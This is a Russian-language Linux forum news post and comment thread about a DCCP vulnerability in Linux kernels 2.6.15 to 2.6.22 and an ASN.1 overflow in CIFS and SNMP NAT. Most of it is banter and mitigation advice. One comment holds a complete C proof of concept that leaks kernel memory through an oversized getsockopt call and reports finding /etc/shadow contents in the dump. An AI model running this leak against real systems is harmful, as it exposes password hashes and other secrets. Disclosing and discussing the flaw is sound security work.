LINUX.ORG.RU

Критическая уязвимость в ядре Linux

 , , ,


0

0

В ядре Linux обнаружена критическая уязвимость, потенциально позволяющая удаленному злоумышленнику выполнить свой код в системе путем отправки специальным образом модифицированного пакета. Проблема вызвана отсутствием проверки валидности параметров пакета в коде подсистемы DCCP (Datagram Congestion Control Protocol).

Уязвимость подтверждена в версии 2.6.18, дополнительно имеются упоминания о наличии данной проблемы в ядрах с 2.6.15 по 2.6.22.

Обновление с исправлением уязвимости, на момент написания новости, было доступно только для Debian GNU/Linux, для Ubuntu обновление находится в процессе подготовки.

Также сообщается о том, что возможность переполнения буфера в коде декодирования ASN.1, используемого в подсистемах CIFS и SNMP NAT, может привести к выполнению кода злоумышленника. Данная проблема была исправлена в вышедших несколько дней назад обновлениях ядра 2.6.25.5 и 2.4.36.6.

>>> Источник (opennet.ru)

Ответ на: комментарий от GFORGX

>Тупо влом опять обновлять ядро...

Ну обновляй не тупо, скачай исходники, наложи патчи, пересобери - а там гляди и утро настанет

anonymous
()

на ноуте можно не париться по поводу таких уязвимостей

MJS
()

Заголовок зря такой страшный. Или тут много кто DCCP использует?

anonymous
()

Дык, вроде, это всё пока EXPERIMENTAL и потому большинства пользователей не касается. Разве нет? В тексте новости об этом ни слова.

alexsaa
()

Если бы новость гласила "Критическая уязвимость в FreeBSD" - через секунду было бы уже штук 100 криков "BSD- RIP". А так - ничего.

tommy ★★★★★
()
Ответ на: комментарий от anonymous

>Это потому, что BSD-RIP.

Это потому что anonymous-ам мозги забыли раздать? А им самим этого не надо. Как и линукс. Поорать только - на это и способны.

tommy ★★★★★
()

Решето!?

Помогите слесть с ванильного ядря, надоело собирать его, но и загромозждать дистрибным ядром не хочется.

anonymous
()
Ответ на: комментарий от anonymous

>загромозждать дистрибным ядром не хочется.

перевод будет на понятный язык?

tommy ★★★★★
()
Ответ на: комментарий от tommy

> Это потому что anonymous-ам мозги забыли раздать?

Нет.

>> Это потому, что BSD-RIP.

anonymous
()

"Гипотетическая" уязвимость. Покажите хоть один взлом, в котором эта уязвимость была использована.

oguretz
()
Ответ на: комментарий от oguretz

> "Гипотетическая" уязвимость. Покажите хоть один взлом, в котором эта уязвимость была использована.

В XXI веке взломы осуществляются за счет неквалифицированных системных администраторов, а не за счет уязвимостей в ядре. Баги в последнем исправляются очень оперативно, первое - лечится очень долго и мучительно.

skwish ★★
()
Ответ на: комментарий от Sylvia

Workaround: Remove dccp support from the installed linux kernel (remove dccp kernel modules etc..) or create a patch for kernel sources.

cat config-2.6.22.9.silvy |grep DCCP CONFIG_NETFILTER_XT_MATCH_DCCP=m CONFIG_IP_DCCP=m CONFIG_INET_DCCP_DIAG=m CONFIG_IP_DCCP_ACKVEC=y # DCCP CCIDs Configuration (EXPERIMENTAL) CONFIG_IP_DCCP_CCID2=m # CONFIG_IP_DCCP_CCID2_DEBUG is not set CONFIG_IP_DCCP_CCID3=m CONFIG_IP_DCCP_TFRC_LIB=m # CONFIG_IP_DCCP_CCID3_DEBUG is not set CONFIG_IP_DCCP_CCID3_RTO=100 # DCCP Kernel Hacking # CONFIG_IP_DCCP_DEBUG is not set

(конфигурация ядра с Убунты, оно есть, но оно в модулях, т.е. кому это надо - загружают это сами, остальных, простите никаким боком не касается что там дырки)

Proof of concept: #include <netinet/in.h> #include <stdio.h> #include <sys/types.h> #include <sys/socket.h> #include <net/if.h> #include <sys/mman.h> #include <linux/net.h>

#define BUFSIZE 0x10000000

int main(int argc, char *argv[]) { void *mem = mmap(0, BUFSIZE, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE, 0, 0); if (mem == (void*)-1) { printf("Alloc failed\n"); return -1; } /* SOCK_DCCP, IPPROTO_DCCP */ int s = socket(PF_INET, 6, 33); if (s == -1) { fprintf(stderr, "socket failure!\n"); return 1; } /* SOL_DCCP, DCCP_SOCKOPT_SEND_CSCOV */ int len = BUFSIZE; int x = getsockopt(s, 269, 11, mem, &len);

if (x == -1) perror("SETSOCKOPT"); else printf("SUCCESS\n");

write(1, mem, BUFSIZE);

return 0; }

Cached disk blocks were found in the dump (e.g. /etc/shadow) and tty buffers.

Sylvia ★★★★★
()

Где используется DCCP? Какими приложениями? А то порой гляжу на него, да на SCTP и TIPC в menuconfig, подумываю включить поглядеть... Но не знаю чем глядеть :) Конечно, можно самому писать проги, но тут уже интерес пасует перед ленью.

const86 ★★★★★
()

В большинстве дистрибутивов поддержка DCCP реализована в виде модулей, но by default они не грузятся. Аналогичная ситуация с SNMP NAT. Т.е. наибольшей опасности подвержены те, у кого самба торчит в интернет.

mutronix ★★★★
()
Ответ на: комментарий от oguretz

> "Гипотетическая" уязвимость. Покажите хоть один взлом, в котором эта уязвимость была использована.

вот если бы на винде нашли такое, все бы вопили какая винда дырявая и нет ей оправдания. а тут с точностью до наоборот.

anonymous
()
Ответ на: комментарий от anonymous

> винда дырявая и нет ей оправдания

Не я это сказал.

anonymous
()
Ответ на: комментарий от anonymous

>вот если бы на винде нашли такое, все бы вопили какая винда дырявая и нет ей оправдания. а тут с точностью до наоборот.

В винде бы про такое никто даже писать бы и не стал, а тут критическая уязвимость...

anonymous
()
Ответ на: комментарий от anonymous

уймитесь ) в линуксе находят много дырок, находят и исправляют, а там они остаются ) но это не значит что их никто никогда не найдет

Sylvia ★★★★★
()
Ответ на: комментарий от Sylvia

заблеклистили dccp чтобы не подгружался и забили на него ) он все равно мало кому нужен

Sylvia ★★★★★
()

Где можно найти подробности про
"возможность переполнения буфера в коде декодирования ASN.1, используемого в подсистемах CIFS и SNMP NAT, может привести к выполнению кода злоумышленника. Данная проблема была исправлена в вышедших несколько дней назад обновлениях ядра 2.6.25.5 и 2.4.36.6."

по ссылкам в новости ничего нет, очень мельком.. а дырка мне кажется не меньшая чем пресловутый dccp

Sylvia ★★★★★
()

чего так пугать-то с утра?

Muromec ☆☆
()

Я знал, что линукс становится постепенно виндой. Линбластер не за горами.

anonymous
()

nao@nao /usr/src $ ./dccpsploit socket failure!

Nao ★★★★★
()

Так что, отключать линуксулатор (liтгч_base на основе FC2, v.2.6.16) во Фре или не надо?

iZEN ★★★★★
()

троллэй то набежало ) дырка во второстепенном модуле , который всего то надо заблеклистить чтобы kernel module loader его не подхватывал =)

Sylvia ★★★★★
()

> DCCP

Прочитал как DCOP, выпал в осадок: KDEшники уже в ядро его протолкнули?!

Sikon ★★★
()

Ну нашли дырку, залатали, о чем шум? Кому надо, уже обновили ядро, хацкеры как обычно в пролете, вистофилы радостно кричат о дырявом линупсе, хотя у самих таких дыр в цать раз больше.

redgremlin ★★★★★
()
Ответ на: комментарий от Sylvia

>дырка во второстепенном модуле , который всего то надо заблеклистить чтобы kernel module loader его не подхватывал =)

Слакварщикам все больше "не нужно" :-)

iRunix ★★★★
()

Каждая обнаруженная и исправленная уязвимость, уменьшает дырявость линукса и приближает вожделенный вендекапец! Но теперь-то, с исправлением последней уязвимости, мы сможем гордо поднять голову и свысока взглянуть на виндузятников, которым до последнего исправления не дожить. А мы - дожили. Ура, товарищи!

anonymous
()
Ответ на: комментарий от anonymous

> Каждая обнаруженная и исправленная уязвимость, уменьшает дырявость линукса и приближает вожделенный вендекапец! Но теперь-то, с исправлением последней уязвимости, мы сможем гордо поднять голову и свысока взглянуть на виндузятников, которым до последнего исправления не дожить. А мы - дожили. Ура, товарищи!

Мечтай :D

anonymous
()
Ответ на: комментарий от anonymous

>>вот если бы на винде нашли такое, все бы вопили какая винда дырявая и нет ей оправдания. а тут с точностью до наоборот.

LOL

В винде такого не бывает. Виндоус - самая лучшая в мире ось. Там понятия несанкционированного удаленного исполнения кода нет в принципе. А от злобных красноглазхых хакеров рекомендовано юзать встроенный файрволл и антивирус касперского :))))))))))))))))))). Жесть

ЗЫ

Проверил. Не работает. Видать чето в конфигах начудил.

anonymous
()
Ответ на: комментарий от iRunix

>Слакварщикам все больше "не нужно" :-)

Абсолютно верно. Слакварщикам не нужно всего того, что неосилил Патрик.

tommy ★★★★★
()
Ответ на: комментарий от redgremlin

> ...хотя у самих таких дыр в цать раз больше.

а если перейти на сухой язык цифр, то в свисте 45 уязвимостей и 17 критических брешей в системе защиты (c) Mike Nash

anonymous
()
Ответ на: комментарий от anonymous

>а если перейти на сухой язык цифр, то в свисте 45 уязвимостей и 17 критических брешей в системе защиты (c) Mike Nash

И это только известных?

redgremlin ★★★★★
()
Ответ на: комментарий от redgremlin

это те, о которых они открыто говорят, т. е. где уже мордой их повозили :)

anonymous
()

Чо вы разорались с утра, некоторых голова, может, болит =)

По факту: Если код писал человек (а Alien кодеров небыло еще замечено), то в нём обязательно будут ошибки. А если учесть то что и компиляторы и ЯПы написаны тоже людьми... Ну вобщем ясно на что я намекаю? Только вот Линукса пишется не жадными троллями, состоящими на службе у жадного клоуна! Да и согласитесь что в открытых исходниках куда проще найти недочет, чем дебагить дебагить и еще раз дебагить черт зна что ;)

SilentLexx
()

Замечательно! Одной дырой меньше. С каждым разом ядро всё стабильнее и безопаснее.

Lumi ★★★★★
()

ждем новые волны тролей и конечно же разборки "линупс" vs "R.I.P." vs "Visla", к сожалению ничего кроме не ожидается

lester ★★★★
()

Ура! У решета BSD появился конкурент!

Quasar ★★★★★
()
Ответ на: комментарий от Lumi

>Замечательно! Одной дырой меньше. С каждым разом ядро всё стабильнее и безопаснее.

С каждым разом ядро всё стабильнее и безопаснее...

Cтабильнее и безопаснее...

Откиньтесь на спинку кресла, ваше ядро становится все стабильнее и безопаснее, стабильнее и безопаснее, с каждым новым ядром вы чувствуете себя все стабильнее и безопаснее, стабильнее и безопаснее... Вам хорошо, вы чувствуете себя стабильно и безопасно... Все замечательно!

anonymous
()
Ответ на: комментарий от mutronix

>Т.е. наибольшей опасности подвержены те, у кого самба торчит в интернет

Т.е. дебилы. Самбой вообще лучше никуда не торчать.

k0l0b0k ★★
()
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.